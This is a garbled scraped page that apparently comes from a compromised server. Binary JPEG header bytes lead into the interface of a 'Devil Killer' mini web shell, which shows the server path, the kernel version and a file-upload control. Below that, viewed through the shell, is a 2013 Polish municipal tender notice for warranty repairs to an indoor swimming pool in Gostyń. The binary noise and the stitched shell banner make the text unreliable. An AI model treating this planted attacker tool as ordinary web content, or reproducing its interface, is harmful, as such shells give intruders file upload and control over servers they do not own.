JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130308/36119-N-2013.html

<p class="kh_header"><b>Gostyń: Remont gwarancyjny krytej pływalni Na Fali 
w Gostyniu</b><br>
<b>Numer ogłoszenia: 36119 - 2013; data zamieszczenia: 08.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gostyń, reprezentowana przez Burmistrza Gostynia , ul. Rynek 2, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5752110-13, faks 065 5752142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont gwarancyjny krytej pływalni Na Fali 
w Gostyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont gwarancyjny krytej pływalni Na Fali 
w Gostyniu;
miejsce wykonywania robót: 
Kryta pływalnia Na Fali
ul. Starogostyńska 9a, 
63-800 Gostyń.

Przedmiot zamówienia podzielony jest na cztery części 
wg niżej zamieszczonego opisu. Zamawiający dopuszcza składanie ofert częściowych: na cztery / trzy / dwie / wybrane części lub jedną wybraną część
(na oddzielnych formularzach ofertowych).

CZĘŚĆ I 
Zakres robót obejmuje m. in.:
1.	   Roboty budowlane, sanitarne:
1.1	Elewacja zewnętrzna budynku - patrz pkt 1 projektu remontu gwarancyjnego krytej pływalni;
1.2	Przewężenia rur spustowych - patrz pkt 2 projektu remontu gwarancyjnego krytej pływalni;
1.3	Przecieki przez ścianę zewnętrzną od strony lasu - patrz pkt 3 projektu remontu gwarancyjnego krytej pływalni;
1.4	Pęknięte szyby w hali basenowej - patrz pkt 8 projektu remontu gwarancyjnego krytej pływalni;
1.5	Dysze w basenie - patrz pkt 9 projektu remontu gwarancyjnego krytej pływalni;
1.6	Niewłaściwie zamontowana armatura sanitarna - patrz pkt 12 projektu remontu gwarancyjnego krytej pływalni;
1.7	Wymiana nieszczelnych opraw oświetlenia podwodnego -  opis pkt 13 projektu remontu gwarancyjnego krytej pływalni.
1.8	Parapety w oknach - patrz pkt 14 projektu remontu gwarancyjnego krytej pływalni;
1.9	Niesprawne siłowniki w oknach - patrz pkt 15 projektu remontu gwarancyjnego krytej pływalni.

CZĘŚĆ II 
Zakres robót obejmuje m. in.:
2.	   Roboty budowlane, sanitarne:
2.1.	Nieszczelność pomieszczeń mokrych - natrysków - patrz pkt 4 projektu remontu gwarancyjnego krytej pływalni;
2.2.	Odpadające płytki w saunie parowej - patrz pkt 11 projektu remontu gwarancyjnego krytej pływalni;

CZĘŚĆ III
Zakres robót obejmuje m. in.:
3.	   Roboty sanitarne: 
3.1.	  Wentylacja - patrz pkt 6 projektu remontu gwarancyjnego krytej pływalni;

CZĘŚĆ IV
Zakres robót obejmuje m. in.:
4.	   Roboty budowlane: 
4.1.	Ubytki w fugach - patrz pkt 5 projektu remontu gwarancyjnego krytej pływalni;                 (w zakres robót wchodzi tylko usunięcie i spoinowanie fug w pomieszczeniach opisanych w przedmiarze z WYŁACZENIEM usuwania i spoinowania niecki: sportowej, do nauki pływania oraz brodzika dla dzieci). 
4.2.	Pęknięte płytki w hali basenowej - patrz pkt 7 projektu remontu gwarancyjnego krytej pływalni;
4.3.	Pęknięte płytki przy kasach - patrz pkt 10 projektu remontu gwarancyjnego krytej pływalni;

Zakresy każdej części zamówienia zostały szczegółowo określone w przedmiarach załączonych do SIWZ. 

Prace dla każdej części zamówienia należy wykonać zgodnie z dokumentacją techniczną (projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót, przedmiarami - kosztorysami), stanowiącą załącznik do SIWZ.
Zamawiający dopuszcza możliwość składania ofert równoważnych.  Wszystkim wskazaniom znaków towarowych, patentów lub pochodzenia występującym w  dokumentacji technicznej towarzyszą wyrazy lub równoważny, co oznacza, że dopuszcza się zastosowanie urządzeń 
i materiałów nie gorszych niż opisywane w dokumentacji, tj. spełniających wymagania techniczne, funkcjonalne i jakościowe co najmniej takie jak wskazane w dokumentacji technicznej lub lepsze.

Uwaga: Postępowanie oznaczone jest jako RI.3438/2006 - wszelka korespondencja oraz dokumentacja w tej sprawie będzie powoływać się na powyższe oznaczenie.

Pozostałe warunki jakie stawia Zamawiający opisane zostały w poszczególnych częściach zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w uzasadnionych okolicznościach, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, 
na podstawie odrębnej umowy zawartej w trybie zamówienia z wolnej ręki.  Przedmiot zamówienia uzupełniającego będzie zgodny z przedmiotem zamówienia podstawowego, określonego w rozdz. III SIWZ i nie przekroczy łącznie 50 % wartości szacunkowej zamówienia podstawowego. W zakres robót uzupełniających można zakwalifikować m. in. roboty związane z wymianą wadliwie działających urządzeń na nowe.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-0, 45.32.00.00-0, 45.33.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę musi wnieść wadium (odpowiednio do wybranej części zamówienia), w wysokości: 
cz. I  - 1.500 zł (słownie: tysiąc pięćset złotych 00/100),
cz. II - 1.300 zł (słownie: tysiąc trzysta złotych 00/100),
cz. III - 1.000 zł (słownie: jeden tysiąc złotych 00/100),
cz. IV - 1.800 zł (słownie: tysiąc osiemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), polegającym na wykonaniu zgodnie ze sztuką budowlaną następujących robót budowlanych:
a)	budowie lub remoncie obiektu budowlanego - jedna robota o wartości nie mniejszej niż 30.000,00 zł (brutto);
(uwaga: wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych);
Część II -Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), polegającym na wykonaniu zgodnie ze sztuką budowlaną następujących robót budowlanych:
a)	budowie lub remoncie obiektu budowlanego - jedna robota o wartości nie mniejszej niż 30.000,00 zł (brutto),
(uwaga: wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych);
Część III -Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), polegającym na wykonaniu zgodnie ze sztuką budowlaną następujących robót budowlanych:
a)	budowie lub remoncie obiektu budowlanego wraz z montażem i izolacją  kanałów wentylacyjnych - jedna robota o wartości nie mniejszej niż 20.000,00 zł (brutto),
(uwaga: wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych);
Część IV -Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), polegającym na wykonaniu zgodnie ze sztuką budowlaną następujących robót budowlanych:
a)	układaniu płytek ceramicznych z fugowaniem, naprawami polegającymi na usunięciu i ponownym fugowaniu - jedna robota o łącznej pow. płytek co najmniej 300 m2;
(uwaga: wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych);

Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cz. I - Zamawiajacy wymaga dysponowanie osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
(uwaga: przynależność do Izby Inżynierów Budownictwa wymagana będzie na dzień podpisania umowy);
Cz. II - Zamawiajacy wymaga dysponowanie osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń,
(uwaga: przynależność do Izby Inżynierów Budownictwa wymagana będzie na dzień podpisania umowy);
Cz. III - Zamawiajacy wymaga dysponowanie osobą z uprawnieniami budowlanymi do kierowania robotami w zakresie instalacji sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
(uwaga: przynależność do Izby Inżynierów Budownictwa wymagana będzie na dzień podpisania umowy);
Cz. IV - Zamawiajacy wymaga dysponowanie osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
(uwaga: przynależność do Izby Inżynierów Budownictwa wymagana będzie na dzień podpisania umowy);
Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 30.000 zł (słownie: trzydzieści tysięcy złotych 00/100),
b)	posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Część II - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 30.000 zł (słownie: trzydzieści tysięcy złotych 00/100),
b)	posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Część III - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 20.000 zł (słownie: dwadzieścia tysięcy złotych 00/100),
b)	posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Część IV - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 40.000 zł (słownie: czterdzieści tysięcy złotych 00/100),
b)	posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wraz z ofertą (wg formularza zał. do SIWZ), należy przedłożyć:pełnomocnictwo do reprezentowania firmy, jeśli dotyczy, a nie wynika ono z innych przedstawionych dokumentów, kosztorysy ofertowe, dowód wniesienia wadium, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany niniejszej umowy dopuszczone są w granicach unormowania art. 144 ustawy Prawo zamówień publicznych, w niżej wymienionych przypadkach:
1)	zmiany danych adresowych stron, ich rachunków bankowych bądź zmiany osób wymienionych przez strony do realizacji umowy,
2)	zmiany formy prawnej prowadzenia działalności gospodarczej przez Wykonawcę,
3)	zmiany terminu wykonania zadania w przypadku wystąpienia nieprzewidzianych okoliczności, na które wykonawca nie ma wpływu (m. in. konieczności wykonania robót dodatkowych, oczekiwania na terminowo zamówione materiały). 
Ww. okoliczności nie stanowią zobowiązania Zamawiającego do zmiany terminu.
4)	zmiany podmiotu trzeciego / podwykonawcy na etapie realizacji zamówienia,
5)	konieczności wprowadzenia robót zamiennych w zależności od specyfiki zamówienia,
6)	zmiany ustawowej stawki podatku VAT.
7)	zaakceptowane przez Zamawiającego zmiany w harmonogramie robót nie wymagają aneksu do niniejszej umowy.
Zmiany umowy mogą być dokonywane na wniosek Zamawiającego lub Wykonawcy 
i wymagają akceptacji przez obie strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (nieodpłatnie) można odebrać w Urzedzie Miejskim, ul. Wrocławska 256,, pok. nr 6, otrzymać za zaliczeniem pocztowym lub pobrać ze strony internetowej www.bip.gostyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 12:00, miejsce: Pisemne oferty należy składać lub przesłać na adres: Urząd Miejski 
w Gostyniu, Rynek 2, pok. nr 10 (sekretariat) lub składać w Wydziale Rozwoju 
i Inwestycji, ul. Wrocławska 256, pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobą uprawnioną do kontaktów z wykonawcami jest: Bogusław Pakuła, Wydział Rozwoju i Inwestycji, Urząd Miejski w Gostyniu, ul. Wrocławska 256, pok. nr 6, 
tel. 65-575 21 10, (tel. bezpośredni 65-575 21 23), 
w dni powszednie w godz. od 8:00 do 15:00; bpakula@um.gostyn.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane, sanitarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m. in.:
1.	   Roboty budowlane, sanitarne:
1.1	Elewacja zewnętrzna budynku - patrz pkt 1 projektu remontu gwarancyjnego krytej pływalni;
1.2	Przewężenia rur spustowych - patrz pkt 2 projektu remontu gwarancyjnego krytej pływalni;
1.3	Przecieki przez ścianę zewnętrzną od strony lasu - patrz pkt 3 projektu remontu gwarancyjnego krytej pływalni;
1.4	Pęknięte szyby w hali basenowej - patrz pkt 8 projektu remontu gwarancyjnego krytej pływalni;
1.5	Dysze w basenie - patrz pkt 9 projektu remontu gwarancyjnego krytej pływalni;
1.6	Niewłaściwie zamontowana armatura sanitarna - patrz pkt 12 projektu remontu gwarancyjnego krytej pływalni;
1.7	Wymiana nieszczelnych opraw oświetlenia podwodnego -  opis pkt 13 projektu remontu gwarancyjnego krytej pływalni.
1.8	Parapety w oknach - patrz pkt 14 projektu remontu gwarancyjnego krytej pływalni;
1.9	Niesprawne siłowniki w oknach - patrz pkt 15 projektu remontu gwarancyjnego krytej pływalni.
Warunki jakie stawia Zamawiający w poszczególnych częściach zamówienia:

Dotyczy części I:
1.	Zamawiający wymaga, aby każda część przedmiotu zamówienia była objęta min. 3-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.
2.	Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w dokumentacji technicznej (projekt budowlany, specyfikacja techniczna wykonania i odbioru robót,  przedmiar robót podzielony na branże: budowlaną, sanitarną w cz. I).
3.	Roboty będą prowadzone w obiekcie wyłączonym z użytkowania. 
4.	Rozliczenia za media (woda, ścieki, energia elektryczna) nastąpią na podstawie opomiarowania poszczególnych mediów (wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych) lub w formie ryczałtu stanowiącego 0,5% wartości brutto wynagrodzenia Wykonawcy. Płatność na konto Ośrodka Sportu i Rekreacji w Gostyniu. 
5.	Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w obiekcie w dni powszednie w godz. od 8:00 do 15:00.
6.	Wykonawca zobowiązany jest do sporządzenia i dostarczenia Zamawiającemu harmonogramu robót przed podpisaniem umowy. Harmonogram należy uzgodnić 
z Zamawiającym. Harmonogram robót musi uwzględniać wszelkie pojedyncze roboty zależne od siebie czasowo i założenia robocze dotyczące poszczególnych etapów robót.
7.	Prace muszą być wykonane do końca umownego terminu.
